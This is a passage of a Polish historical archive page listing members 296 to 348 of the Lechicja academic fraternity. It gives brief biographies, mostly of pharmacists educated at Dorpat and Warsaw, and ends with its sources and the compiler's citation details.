 296. Stanisław Szutowicz, (2 maja 1885 w Markowej woj. Wileńskie - ) prowizor UD 1915, członek Lechicji w Dorpacie, pracownik apteki w Parczewie, pracownik apteki szpitala Św. Wincentego a’ Paulo w Pułtusku,
 297. Bolesław Szwejkowski, (1872 - ) prowizor UD 1907, członek K! Znicz w Dorpacie, zarządzający apteki w Kolbuszowej

  Stanisław Szydłowski, 1904 r.

 298. Stanisław Szydłowski, (22 stycznia 1887 w Wilkanowie pow. Płock - ) s. Stanisława, prowizor UD 1904, członek K! Znicz w Dorpacie

 299. Szydziński,
 300. Jerzy Szymański, student UW, student SGGW (1929), c. 1927/28 (?), akt. 1927/28-29

  Wacław Szymański, druga poł. lat 20-tych.

 301. Wacław Szymański, (1900-1978) student prawa UW, c. 1925/26 (?), akt. 1925/26-29, prawnik, adwokat

 302. Stanisław Śmigielski, student PW, c. 1924/25 (?), akt. 1924/25-32
 303. Edward Świeżyński, student UW, c. 1931/32, akt. 1931/32-32
 304. Tadeusz Taczanowski, student w Warszawie, a następnie USB Wilno 1927, akt. 1924-28
 305. Tokarski,
 306. Jan Tomaszewski, s. Henryka, student UD, członek K! Znicz w Dorpacie
 307. Wiktor Tomaszewski, (1881 - ) prowizor UD 1911, członek Lechicji w Dorpacie, właściciel apteki w Skierniewicach,
 308. Zbigniew Tomczyk, student WSH, c. 1927/28 (?), akt. 1927/28-28
 309. Bronisław Tomczyński, brat Witolda (Lechicja), student PW, c. 1930/31, akt. 1930/31-32, inż. cukrownictwa, pochowany na warszawskich Powązkach
 310. Witold Tomczyński, ( - przed 1973 ?) brat Bronisława (Lechicja), student PW, c. 1930/31, akt. 1930/31-32, inż. cukrownictwa, pochowany na warszawskich Powązkach

  Mieczysław (?) Treutler, 1910 r.

 311. Mieczysław Treutler, (1890 - ) student farmacji UD, członek Lechicji w Dorpacie, mgr farm. UJK 1922, współwłaściciel apteki w Warszawie

  Aleksander Trębaczkiewicz, 1926 r.

 312. Aleksander Ludomir Trębaczkiewicz, (1877 w Słupcy - 8 czerwca 1928) szwagier Jana Piętki (Lechicja), wuj Andrzeja Piętki (Lechicja), teść Henryka Golanowskiego (Maritimia), student farmacji UD, członek Lechicji w Dorpacie, prezes ok. 1908-09, prowizor UD 1908, właściel apteki w Rostowie nad Donem, po 1918 właściel Hurtowni Surowic i Szczepionek przy ul. Wareckiej w Warszawie oraz Domu Handlowego Trębaczkiewicz i Ska., pochowany na warszawskich Powązkach

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Henryka Golanowskiego i Jana Piętki)]

 313. Stefan Trzaska, akt. 1924-26, prezes 1925/26
 314. Hugon Tymiński, (1 kwietnia 1883 w Wołkowysku - 1939 w Wołkowysku) s. Andrzeja, dyplom pomocnika aptekarskiego Uniwersytet Moskiewski, członek Lechicji w Dorpacie, stały gość Venedyi 1907, prowizor UD 1909, właściciel apteki w Wołkowysku, rozstrzelany przez NKWD
 315. Bronisław Tyszer, prowizor (UD ?) 1912, członek Lechicji w Dorpacie

  Zdzisław Ulatowski, 1910 r.

 316. Zdzisław Ulatowski, student farmacji UD, członek Lechicji w Dorpacie

 317. Stefan Urban, (1905 - 7 lutego 1974) student weterynarii UW, c. 1924/25 (?), akt. 1924/25-30, olderman sem. let. 1927/28, lekarz weterynarii, po wojnie w Ministerstwie Rolnictwa w Warszawie

  Adam Wachlewicz, VI 1924 r.

 318. Adam Wachlewicz, (29 listopada 1886 w Dobrzyniu nad Wisłą - 11 listopada 1963 w Toruniu) s. Wincentego i Konstancji z d. Majewska, prawd. absolwent Gimnazjum w Płocku, pracował jako pomoc apteczna w Warszawie 1907-1915, student i absolwent w stopniu pomocnika farmaceuty 1911 UW, student farmacji UD i student i absolwent (magister) 1924 (1923 ?) farmacji UW, członek Lechicji w Dorpacie, prowadził apteki w Koźminku w Kaliskiem oraz w Warszawie 1925-1937, od 1937 właściciel apteki w Puławach, a po jej upaństwowieniu po wojnie jej kierownik, w czasie okupacji współpracował z ruchem oporu dostarczając środki farmakologiczne, pochowany na Cmentarzu w Dobrzyniu

 319. Wiktor Walenta, (1891 - ) student farmacji UD, członek Lechicji w Dorpacie, mgr farm. UJB 1926, zarządzający apteką Ubezpieczalni Społecznej w Częstochowie

  Wacław Walewski, pierwsze lata XX wieku.

 320. Wacław Michał Walewski, (24 września 1882 w Warszawie - 18 października 1936 w Chełmie) syn Władysława i Bronisławy z Wojtyńskich, prowizor UD 1908, członek Lechicji w Dorpacie, po studiach dzierżawił aptekę Barcza na ul. Marszałkowskiej w Warszawie, następnie w Jabłonnej, po wojnie w 1921 nabył pół apteki Bronisława Boguszewskiego w Chełmie, a w 1931 nabył drugą połowę. Działacz społeczny, naczelnik Ochotniczej Straży Obywatelskiej w Jabłonnej, wieloletni radny miasta Chełma, członek Rady Wojewódzkiej Związku Międzykomunalnego Opieki Społecznej w Lublinie, członek wielu komisji, Prezes Chrześcijańskiego Towarzystwa Dobroczynności

 321. Jerzy Wasilewski, student PW, c. 1932, akt. 1932
 322. Tadeusz Wągrowski, c. 1924/25 (?), akt. 1924/25-25
 323. Feliks Franciszek Wcisło, (3 stycznia 1902 w Kromołowie w pow. będzińskim - 1940 w Katyniu) s. Feliksa i Zofii z Hartwigerów, w wojnie polsko-rosyjskiej 1920 w 9 Pułku Ułanów, student WP, akt. 1924-32, pracownik Głównego Urzędu Miar i Wag w Warszawie, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Modlinie 1930, por. rez., przydzielony do 6 Baonu Saperów, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Srebrnym Krzyżem Zasługi
 324. Tadeusz Wcisło,
 325. Eugeniusz Wejmer, (1885 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Niwce pow. Będzin
 326. Jan Tadeusz Weroczy, (1873 - ) dpl. 1898, właściciel aptek przy ul. Radnej 11 i ul. Bednarskiej 13 w Warszawie
 327. Eugeniusz Wesołowski, ( - 1920) student farmacji UD, członek Lechicji w Dorpacie,
 328. Józef Wędkowski, (19 marca 1890 w Pułtusku - ) student farmacji UD, członek Lechicji w Dorpacie, mgr farm. UW 1922, pracownik apteki w Lublinie
 329. Stanisław Węgierski, (1881 - ) prowizor UD 1910, członek Lechicji w Dorpacie, właściciel apteki w Łowiczu
 330. Teofil Węgrzyn, prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Radomsku
 331. Adam Wisławski, student UW, akt. 1927-29
 332. Tadeusz Włoszek, student farmacji UD, członek Lechicji w Dorpacie, sekretarz zamiejscowy sem. wios. 1910
 333. W. Wodnicki, student UD, członek K! Znicz w Dorpacie
 334. Zbigniew Wójcicki, student SGGW, akt. 1931
 335. Wacław Wójcik, członek ‘gość’ Lechicji w Dorpacie
 336. Janina Wóycicka, członek ‘gość’ Lechicji w Dorpacie
 337. Mieczysław Wóycicki, członek ‘gość’ Lechicji w Dorpacie
 338. Jan Wawrzyniec Wyszyński, (1883 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel apteki w Bereznie pow. Kostopol
 339. Bolesław Zaborowski, student farmacji UD, członek Lechicji w Dorpacie
 340. Stanisław Zakrzewski, student farmacji UD, członek Lechicji w Dorpacie, c. 1915
 341. Jerzy Zalewski, (20 listopada 1894 w Rawie Mazowieckiej - 1940 w Katyniu) s. Adolfa i Marii z Uszyckich, student i absolwent 1917 med. UD, członek ‘gość’ Lechicji w Dorpacie, dr med., kpt. rez., w 1920 orydnator Szpitala Wojskowego w Szczypiornie i Aleksandrowie Kujawskim, a następnie do kadry 1 Szpitala Okręgowego, w wojnie obronnej 1939 w Centrum Wyszkolenia Sanitarnego, w niewoli sowieckiej, zamordowany przez NKWD
 342. Kazimierz Zalewski, (1891 - ) prowizor UD 1915, członek Lechicji w Dorpacie, właściciel apteki w Rawie Mazowieckiej, następnie praca w laboratorium
 343. Henryk Zatorski, student prawa UW, c. 1927/28 (?), akt. 1927/28-28, prawnik, adwokat
 344. Walenty Zawadzki, członek ‘gość’ Lechicji w Dorpacie
 345. Jan Zieliński, (1880 - ) prowizor UD 1909, członek Lechicji w Dorpacie, zarządzający apteką Warszawie
 346. Marjan Żukowski, c. 1924/25 (?), akt. 1924/25-25
 347. Zdzisław Żukowski, c. 1924/25 (?), akt. 1924/25-25
 348. Stanisław Żywno, (1887 - ) prowizor UD 1914, członek Lechicji w Dorpacie, właściciel fabryki opłatków w Warszawie

Pieczęć Lechicji, lata 30-te.

Listę członków opracowano na podstawie:

1) A. Hübner, J. Muszyński, Pierwszy Zjazd Lechitów w Warszawie, Wiadomości Farmaceutyczne 1921, nr 9, s. 1 i n. (?),
2) Maria Głowniak, Biogramy członków Lechicji - farmaceutów, maszynopis, ss. 14,
3) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1932,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Lechicja.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 18 III 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Lechicja (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 18 III 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }